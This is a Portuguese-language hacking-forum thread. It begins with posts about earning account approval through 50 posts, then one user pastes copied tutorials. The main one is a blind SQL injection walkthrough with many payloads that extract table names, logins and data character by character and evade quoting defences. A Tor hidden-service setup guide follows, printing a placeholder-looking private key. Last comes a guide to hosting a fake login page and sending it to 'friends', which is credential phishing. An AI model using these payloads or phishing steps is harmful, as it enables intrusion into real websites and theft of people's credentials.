Como ser aprovado com os 50 posts

Moderators: j4ckass, mespeed1, MrDickles, Zummey, bot3r, Lecter

User avatar
swito1
New user
New user
Posts: 52
Joined: Fri Jul 19, 2019 2:37 am
Been thanked: 18 times

Como ser aprovado com os 50 posts

Post by swito1 » Sat Jul 20, 2019 10:20 pm

È bom simples mas muitas pessoas ficam se perguntando o que fazer quando pegar os 50 posts, mas eu venho dizer que é simples apos isso sua conta sera confirmado porque há duas maneiras de confirma-la

1- pagando com bitcoins

Eles não aceitam outra forma de pagamento

2- com os 50X posts

Apos isso sua conta sera desbloqueada ai você consegue usar !permissoes
:arrow:
sou 🇧🇷

User avatar
BlackL0rd
New user
New user
Posts: 12
Joined: Thu Aug 01, 2019 5:29 pm

Post by BlackL0rd » Thu Aug 01, 2019 5:43 pm

Ahhh. Muito boa essa informação.

User avatar
Henriquak47
New user
New user
Posts: 7
Joined: Wed Jul 10, 2019 4:44 pm

Post by Henriquak47 » Thu Aug 08, 2019 2:11 pm

boa....

Added in 5 minutes :
estou ansioso

User avatar
Best_anubis
New user
New user
Posts: 46
Joined: Sun Aug 11, 2019 3:26 am
Been thanked: 2 times

Post by Best_anubis » Sun Aug 11, 2019 4:05 am

Boa resposta... to tentando kkk

User avatar
Arpanet
New user
New user
Posts: 51
Joined: Wed Jul 17, 2019 2:01 am
Been thanked: 7 times

Post by Arpanet » Mon Aug 12, 2019 9:32 pm

Com quem eu converso para conseguir a autorização?
A R P A N E T
Arpanet foi a primeira rede operacional de computadores a utilizar o protocolo TCP/IP com o objetivo de interligar as bases militares e os departamentos de pesquisa do governo americano.

User avatar
Benevides
New user
New user
Posts: 40
Joined: Wed Aug 14, 2019 2:56 pm
Been thanked: 3 times

Post by Benevides » Thu Aug 15, 2019 1:57 am

tutorial bem simples mas muito útil muito obrigado :D
Lil Bene

User avatar
Best_anubis
New user
New user
Posts: 46
Joined: Sun Aug 11, 2019 3:26 am
Been thanked: 2 times

Post by Best_anubis » Mon Aug 19, 2019 3:52 am

Boa resposta... ate algum Adm ver e nao autorizar por causa de mensagens spam kkkk Povo fica criando tópicos aleatórios aqui achando que vai liberar kkk

User avatar
alanvitor
New user
New user
Posts: 2
Joined: Sat Aug 10, 2019 8:34 pm

Post by alanvitor » Thu Sep 12, 2019 2:15 pm

sxrtyhst

Added in 1 minute 2 seconds:
sxrtyhst
aerghyaeryaery

User avatar
Fodanal
Posts: 116
Joined: Sun Jul 21, 2019 10:30 pm
Been thanked: 36 times

Post by Fodanal » Fri Sep 13, 2019 12:27 pm

Essa negócio de 50 post é um aperto de mente, concluí meus 50 posts e entrei em contato com um moderador faz um mês e eles dizem que vão verificar, exigem mais burocracia etc etc... Já faz 2 meses que tentei e desisti, só estou no fórum porque gosto mesmo. Boa sorte

Edit:
Passando aqui para avisar que está tudo certo, minha assinatura foi aceita depois de um mês, aconselho para aqueles que concluírem os 50 posts entre em contato com uma admin do canal #brazil-help. Eles irão verificar. Boa sorte
SEXO É BOM, PORÉM MANEIRA NA TRANSA. ISSO É PREJUDICIAL

User avatar
cobrainfocc
New user
New user
Posts: 10
Joined: Tue Sep 17, 2019 11:24 pm

Post by cobrainfocc » Wed Sep 18, 2019 5:05 am

Acredito que informaçao deve ser compartilhada
Quem tem gosto há de a entender =)
Olás a todos neste tutorial irei explicar do que se trata Sql Injection -- Blind
Porque acontece o erro e como explora.lo

Aviso: Vao precisar de tempo

Requesitos Noção basica de Sql

Começando...

Podemos observar abaixo o seguinte codigo vulneravel:

Código:
// Verifica a id do login
$id = " ";
$query = " SELECT * FROM usuarios WHERE login = $id ";
echo "Normal: " . $query . "<br />";

O que se esta a passar acima?
Bem.. basicamente temos um script escrito em php onde estamos a recorrer ao mysql. Na variavel $query estamos a seleccionar todas as colunas da tabela usuarios onde a coluna login tem o valor $id que e inserida pela pessoa que esta a navegar.

O comando echo faz com que retorne na pagina todas as colunas dessa tabela se a sintase for verdadeira e estiver correcta.

-----------------------------------------------

Exemplo de exploraçao da vulnerabilidade

Código:
// Verifica a id do login
$id = "1 AND 1=1 ";
Sendo assim na nossa base de dados ficaria:

Código:
// Verifica a id do login
$query = " SELECT * FROM usuarios WHERE login = 1 AND 1=1 ";
echo "Normal: " . $query . "<br />";
Bem como isto e um tutorial de blind vamos passar qo que interessa...

Como a afirmaçao acima contida em $id e verdadeira e nao apresenta erros de sintase a pagina vai abrir normal e retornar todas as colunas do usuario cuja $id = 1

-----

Agora vamos testar:

Código:
$id = " 1 AND 1=0 "
Ficando:

Código:
// Verifica a id do login
$query = " SELECT * FROM usuarios WHERE login = 1 AND 1=0 ";
echo "Normal: " . $query . "<br />";
Acima podemos verificar que a sintase nao tem erros porem 1 != (e diferente) 0 logo esta afirmaçao nao e verdadeira o que nos irá retornar a pagina, porém sem conteudo

É precisamente aqui que nos vamos servir da vulnerabilidade
Lembrando que o nome Blind Sql injection deriva disto
Estamos a injectar codigos onde o site nao nos retorna erros baseamo.nos em verdadeiros e falsos (lembrando que existem outros metodos com wait for delay e etc que nao irei abordar ainda neste tutorial)

----------

Passando a acçao:

Agora poderemos nos servir de algumas funçoes do mysql para explorar a falha, por exemplo...

[Ja devem ter ficado com uma noçao...a partir daqui vou postar menos vezes o script todo e resumir.me a injection]

Exemplo:

Código:
1 AND substring(@@version,1,1)=5
O que significa?
Basicamente estamos a recorrer a funçao substring do mysql.
O que e uma string?
String e uma cadeia de caracteres.
O que faz a substring() ?
A funçao substring() adiciona valores (string) dentro dela. Nos poderemos aproveitar esta funçao para verificar caracter a caracter cada letra desse mesmo valor...

Simplificando...

No codigo acima estamos a adicionar @@version e verificar o seu primeiro caracter em ,1,1 neste caso...verificamos se e igual a 5

Suponhamos que a versao e a 5.0.27 entao p primeiro caracter desta string e =5 Sendo assim a afirmaçao injectada verdadeira. Logo o conteudo do site irá aparecer.

Se testarmos com

Código:
1 AND substring(@@version,1,1)=4
O conteudo nao ira aparecer porque apesar da sintase ser correcta, e falsa, logo nao vai retornar nada no site.

Espero que tenham percebido...

O que nos interessa saber?
O nome da base de dados, das colunas e das tabelas
Normalmente o nome da base de dados nem verificamos em blind
Por isso vou so verificar as tabelas e colunas visto que o processo e o mesmo

Explorando...

Código:
1 AND (select 1)=1
O site retorna.nos verdadeiro and =2 obvio que nao retorna nada

-----------------

Adivinhaçao de tabelas:

Código:
1 AND (select 1 from nome_da_tabela)=1
Vamos testando varios nomes ate acertar ...
Neste caso para nos dar um resultado verdadeiro no retorno da pagina teria que ser :

Código:
1 AND (select 1 from usuarios)=1
Usamos o mesmo procedimento para listarmos as colunas:

Código:
1 AND (select nome_da_coluna from usuarios)=1
Para obtermos retorno verdadeiro neste caso especifica seria:

Código:
1 AND (select login from usuarios)=1
E o site apareceria com o conteudo do usuario cuja $id = 1
(ja se tinham esquecido do script nao? )

Porem nao nos retorna o valor da coluna login
Lógico que nao. Como isto e um tutorial de blind nao me interessa explicar a exploraçao de mudar a $id para negativa e juntar as colunas todas com union.

---------------------------

Vamos agora descubrir qual o valor que esta contido na coluna login
Para isso vamos usar outra funçao.
A funçao ascii() e verificamos o valor de cada caracter ascii em decimal

Explorando e esplicando...

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>0
O que faz o codigo acima?
Bem basicamente temos uma string com a concatenaçao da coluna login (usei o comando concat caso queiram concatenar colunas ne? ) e vamos verificar o valor do primeiro caracter em ascii, com a funçao ascii() neste caso o site retornanos verdadeiro (a esta altura do campeonato ja devem saber o que verdadeiro e ) porque o primeiro caracter da substring() que contem o valor da coluna login no limite 0,1 é >0

Leiam bem com atençao para nao restarem duvidas

------------

Sabendo isto vamos verificar agora qual o valor exacto (em decimal) deste caracter:

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>50
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>94
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>100
Falso hummmm

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>96
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>97
Falso

Ora bem ja temos o nosso primeiro caracter do valor da coluna login
O primeiro caracter e >96 mas nao e >97 logo o nosso caracter vai ser 97
Agora so precisamos de ir a uma tabela ascii verificar o caracter correspondente ao valor 97 em ascii será ele [a]
(Boa tabela no fim do tutorial)

Feito isto vamos passar a verificaçao do 2 caracter...

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),2,1))>0
Verdadeiro -- Logo existe (ja explico)

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>96
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>105
Falso

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>99
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>100
Falso

Na tabela ascii 100 corresponde ao caracter [d]

Ja temos.. ad

Vou passar alguns caracteres a frente....

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),5,1))>96
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>105
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>110
Falso

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>108
Verdadeiro

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>109
Verdadeiro

Perceberam? o caracter e >109 mas nao e >110 logo o 5º caracter e [n]

Agora nos temos ad**n

Como podem calcular se fizessemos os outros caracteres o valor da coluna login sera admin

Mas......

Vamos testar se nao a mais caracteres para a frente

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 0,1),6,1))>0
Falso

O que significa?

Significa que o 6º Caractere nao e >0 logo nao existe

Passemos agora ao proximo usuario...

Código:
1 AND ascii(substring((select concat(login) from usuarios limit 1,1),1,1))>0
Verdadeiro

Basta apenas ir mudar o limit para o a seguir e ir usando a mesma tecnica

Acham cansativo?
Esperem ate ler o proximo...

-------------------------------------------

Descobrir nome de tabelas e colunas de modo infalivel

Bem na tecnica acima tentamos adivinhar o nome da tabela e da coluna -- tivemos sorte...mas e quando o nome nao e assim tao facil de adivinhar?

Foi aqui que pus o cerebro a trabalhar...bem..facil

Vejamos:

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 0,1),1,1))>0
Verdadeiro

Nao tem nada que saber pessoal...agora e usar o mesmo metodo para descubrir o nome da tabela

Ja sabemos que a primeira letra....

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 0,1),1,1))>66
Verdadeiro

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 0,1),1,1))>67
Falso
o 1º caracter seria C

Podemos ate deduzir que o resto do nome seria CHARACTER_SETS


Onde esta o truque?

O truque agora esta em tentar ser objectivo...
Por exemplo...vamos logo tentar descubrir a tabela onde a primeira letra seja um [a] de admin se nao houver... um [l] de login .. [m] de membros , de usuarios...isso agora fica ao vosso criterio...

Neste tutorial especifico o nome da tabela e usuarios logo vou usar este

Primeiro vemos quantas tabelas tem a base de dados... usando o limit

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 100,1),1,1))>0
Verdadeiro

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 101,1),1,1))>66
Falso

Vemos que tem 101 tabelas...
Agora vemos qual a tabela que começa pela letra

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 101,1),1,1))>117
Verdadeiro

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 50,1),1,1))>117
Verdadeiro

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 49,1),1,1))>117
Falso

Código:
1 AND ascii(substring((select concat(table_name) from information_schema.tables limit 49,1),1,1))>116
Verdadeiro

Logo a primeira letra da tabela [49] e
Usamos a mesma tecnica para descubrir o resto do nome...que neste caso seria usuarios...


Descubrindo as colunas...

Código:
1 AND ascii(substring((select concat(columns_name) from information_schema.columns where table_name='nome da coluna' limit 0,1),1,1))>0
Verdadeiro

A tecnica usada seria a mesma tanto para os caracteres como para o posicionamente da coluna na base de dados..e so ser esperto


Quando tivermos o nome das tabelas e colunas e so concatenar o resultado como ja explicado acima



-----------------------------------

Barreiras impostas pelos admins:

Bem, existem maneiras de os admins tentarem dificultar a tarefa...
Uma delas...

Código:
// Verifica a id do login
$id = " ";
$query = " SELECT * FROM usuarios WHERE login = '$id' ";
echo "Normal: " . $query . "<br />";
Bem facil de passar basta obter uma sintase correcta...
Neste caso

Código:
1 AND 1=1
Falso -- O site nao diz mas e erro de sintase
Código:
1' AND '1'='1
Verdadeiro



Vamos verificar

Código:
$query = " SELECT * FROM usuarios WHERE login = '1' AND '1'='1' ";
A partir daqui e usar o mesmo metodo para dar a volta a sintase

Código:
1' AND substring(@@version,1,1)='4
Código:
1' AND (select nome_da_coluna from usuarios)='1
Código:
1' AND ascii(substring((select concat(login) from usuarios limit 0,1),1,1))>'0
Código:
1' AND ascii(substring((select concat(columns_name) from information_schema.columns where table_name='nome da coluna' limit 0,1),1,1))>'0
Só arranjar maneira de obter uma sintase correcta

--------------------

Agora...quando as magic quotes estao ligadas
Uma das opçoes ainda bastante usada pelos admins para travar lammers de invadirem o seu site e o uso das magic quotes. Em que consiste este processo?

O administrador utiliza a funçao mysql_real_escape_string()
Vejam abaixo:

Código:
// Verifica a id do login
$id = mysql_real_escape_string($id);
$query = " SELECT * FROM usuarios WHERE login = '$id' ";
echo "Normal: " . $query . "<br />";
O que faz essa funçao?
Ela vai substituir as quotes(') por \'

Assim ficando a nossa injection...

Código:
1\' AND \'1\'=\'1
Falso

O site nao retornaria o os valores das colunas.

Bem a verdade e que se as magic quotes estiverem ligadas com blind sql injection nao conseguimos explorar..so com advanced :/

Se o site so estiver vulneravel a blind..podem esquecer xD

------------------------

Boa protecçao usada pelos admins abaixo

Código:
// Verifica a id do login
$id = (int)$_GET['id'];
$query = " SELECT * FROM usuarios WHERE login = '$id' ";
echo "Normal: " . $query . "<br />";
Assim a pagina so vai retornar os valores se id for inteiro
- esta vai greetz po ravnos -

-------------------------------

Ora espero que tenham gostado e percebido
Deu bastante trabalho a escrever...
Por isso façam o favor de meter os creditos onde quer que seja que postem este tutorial

Creditos: Lenamote™

Added in 2 minutes 25 seconds:
Beunas Personas...

Vamos la !

Requisitos obrigatórios:

Apache HTTP Server (Linux) Vidália ou TOR (Linux) corretamnte instalado e funcionando).

Este tuto Será baseado em Linux, em termos de segurança e comodidade...

Configuração Linux:

Apenas uma diretiva é necessaria:

Caminho do Arquivo de chave Key
HiddenServiceDir /var/caminho/doarquivo/
HiddenServicePort 80 127.0.0.1:80
HiddenServicePort 443 127.0.0.1:443

Primeira linha: configura onde o vidália (TOR)
vai colocar os arquivos referentes ao host na onion.

Segunda linha: sites sem SSL.

Terceira linha: caso queira também implementar um servidor
com HTTPS deixe a linha e o apache devidamente configuradopara usar SSL.

A diretiva: HiddenServicePort você também pode colocar nas portas:

21 = FTP
22 = SSH
23 = Telnet
53 = DNS

E outras portas. Porém, por motivos de segurança não é recomendado deixar
o servidor telnet,SSH e DNS na onion.

Configurações de Segurança Linux:

# Iptables ativo e configurado para fechar conexões entrantes de qualquer
porta.
# Contexto SELinux ativo para manter a segurança do servidor.
# Apache HTTP Server configurado corretamente e não pode: listar diretório,
mostrar assinatura, ter e-mail ou indentificar e-mail do Webmaster (a não ser o do Tor e-mail)
e outros requisitos de hospedagem que serão passados ao longo do tuto.
# ACL de arquivos muito bem definidas! O que é do usuario root não pode ficar exposto.

Tenha Cuidado do Conteudo Postado!

Tenha bom senso. Cuide o que ir colocar em sua pag. Se você não posta conteudo
ilegal, não se preocupe, nãoo vai acontecer nada com você.
Agora se você posta conteudo ilegal, saiba que é responsabilidade SUA!

Tenha os requisitos de segurança sempre em mente. Na Onion, Crackers são muito
mais ageis que na internet convencional, e se eles pegarem seu site... Bom tenho pena do seu sistema
Então já preparese!

Hidden Service How-To Ubuntu Apache 2 Tor
http://nfokjgfj3hxs4nwu.onion

Usando CientifiqueLinux... Vamos colocar a mão na massa ...

Código:
cd /etc
Código:
cd tor
Código:
vim torrc
Abrimos o Arquivo de Config, do TOR.

E procurem pelas linhas HiddenServiceDir /var/lib/tor/hidden_service
.......................................HiddenServi cePort 80 127.0.0.1:80
Inclua em baixo...............HiddenServicePort 443 127.0.0.1:443
E Descomente elas...

Coloque os Arquivos de Chave Key e de Host dentro da HiddenServiceDir podendo modificar o caminho dos docs.

Instalando Apache e mod SSL:

Código:
cd /etc
Código:
cd httpd/conf
Código:
ls
Código:
cd conf.d
Código:
ls
Código:
vim ssl.conf
Configuração do Apache:

Tenha certeza que o listen esteja em 443.

Agora va até a pasta que foi mostrada como chave key e host...

Código:
su
Código:
cd /var
Código:
cd yp
Código:
ls
Citação:
hostname private_key
Código:
cat hostname
Seu Host(link do seu site)
Citação:
kwdinwbugerbsveghavhvw.onion
Código:
cat private_key
Chave key (que ira se indentificar com seu host, tornandose uma chave só)
Citação:
ejnnjnaoenofsnnfsjndjfnsoneofnenfieufure
ejbfshbfhebksabfehbfkhbsejfsabefkbaksebfbfkbakbhef
feajhbfkabsefkbasebfkhbsaekfbskbdfbskjebjfbskejbfj bsf
kaejbfksbjebjbfbrevvshyvefseujhfsjbaedfbjsabdfjbad fsadf
aekjbhfjabsefjbsaebfjbsddjbfjkbsdfjbskejbfkjbdskbf kjbsdjbf
eajbfkaebfkjbajksdbfkjbaskjfbkjbsdkjbfskjbdfkjsbdk fjbksfs
ajfbsabdfjbsdfbskdjbfskjbdfksbkdjbfksjbdjbfskjdbfj bsdf
auebvbuebuseowheuyoyoiqibksjdfjcbdsjbcdfdfksdjbfks bfsd
ajbsdkabsjbakjbsdjbakjbdkajbsdjbasdbalsldkallawoda wpjdoi==
--------END RSA PRIVATE KEY--------

Ola tudo bem, sou Hcrypter... bom este poste deu trabalho para ser feito...
então no minimo cliquem em obrigado para agradecer meu esforço caso nao seja do agrado de vcs ...

Muito obrigado e até ...

Added in 1 minute 51 seconds:
Hospedando Fake no Just Free
Bem o JustFree não tem propaganda e é um host bom...

Nesse tutorial eu ensino a Hospedar sua fake la.

Va ao site do Just Free

Apos isso logue-se no site.


Após logar-se no site aparecera uma mensagem dizendo que você foi bem logado e esta sendo redirecionado algo do tipo.


Bem agora como mostra a imagem:

1-O numero 1 é seu dominio pra você manda pra seus 'amigos' se loga
2-Para poder hospedar a pagina clique em FileManager como aponta a seta numero 2

Agora clique em Upload Files


Quando você clica em Upload Files aparece a seguinte imagem:


Para enviar o arquivo da sua fake clique em Arquivo e para hospedar clique em Upload.

Bem depois de hospedado o arquivo clique em cima dele e abrira seu site.


1-Nessa opção você pode excluir o file.

2-Nessa opção você pode renomear o file.

3-Nessa opção você pode fazer o download do file.

Bem galera é isso aew...

Qualquer duvida é só posta aew.

Post Reply